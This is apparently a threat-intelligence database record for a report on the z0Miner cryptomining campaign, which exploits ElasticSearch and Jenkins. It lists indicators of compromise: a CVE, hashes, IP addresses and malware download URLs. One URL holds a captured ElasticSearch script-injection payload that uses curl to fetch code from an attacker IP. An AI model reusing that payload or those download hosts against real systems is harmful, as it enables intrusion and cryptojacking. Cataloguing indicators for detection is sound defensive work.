Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
Common Information
Type Value
UUID 9673d48a-c27a-48f7-8dfe-04e70bafb2ea
Fingerprint aca119809d979b8d
Analysis status DONE
Considered CTI value 2
Text language
Published March 8, 2021, midnight
Added to db Sept. 11, 2022, 12:42 p.m.
Last updated Nov. 17, 2024, 6:53 p.m.
Headline Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
Title Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
Detected Hints/Tags/Attributes 29/2/27
Attributes
Type    #Events  Value
CVE     17       cve-2015-1427
Domain  42       tencent.com
Domain  358      pastebin.com
Domain  10       solr.sh
File    1        1170.html
File    5        conf.txt
File    1        z0.txt
File    153      config.json
File    87       java.exe
File    23       xmrig.exe
md5     1        84417ff134484bb8ce4ff567574beaa5
md5     1        c1dcc75d729e31833892cb649f450568
md5     1        adb190c4e90cc61ca266cfda355826df
md5     1        d833fc2ced5d0791a404ced14ecf4e20
md5     1        26a91e9a94c7f8d966de1541095a3d92
md5     1        373b018bef17e04d8ff29472390403f9
IPv4    7        27.1.1.34
IPv4    1        178.62.202.152
Url     1        https://s.tencent.com/research/report/1170.html
Url     1        http://27.1.1.34:8080/docs/conf.txt
Url     1        http://27.1.1.34:8080/docs/conf.txt+-o+/tmp/solr".execute().text&json={"script":+"println+\"curl+-fssl+http://27.1.1.34:8080/docs/conf.txt+-o+/tmp/solr\".execute().text
Url     1        https://pastebin.com/raw/4rb51qkw
Url     1        https://pastebin.com/raw/bwd1bcxt
Url     2        http://27.1.1.34:8080/docs/config.json
Url     1        http://178.62.202.152:8080/wuck/java.exe
Url     1        http://27.1.1.34:8080/docs/solr.sh
Url     1        http://178.62.202.152:8080/wuck/xmrig.exe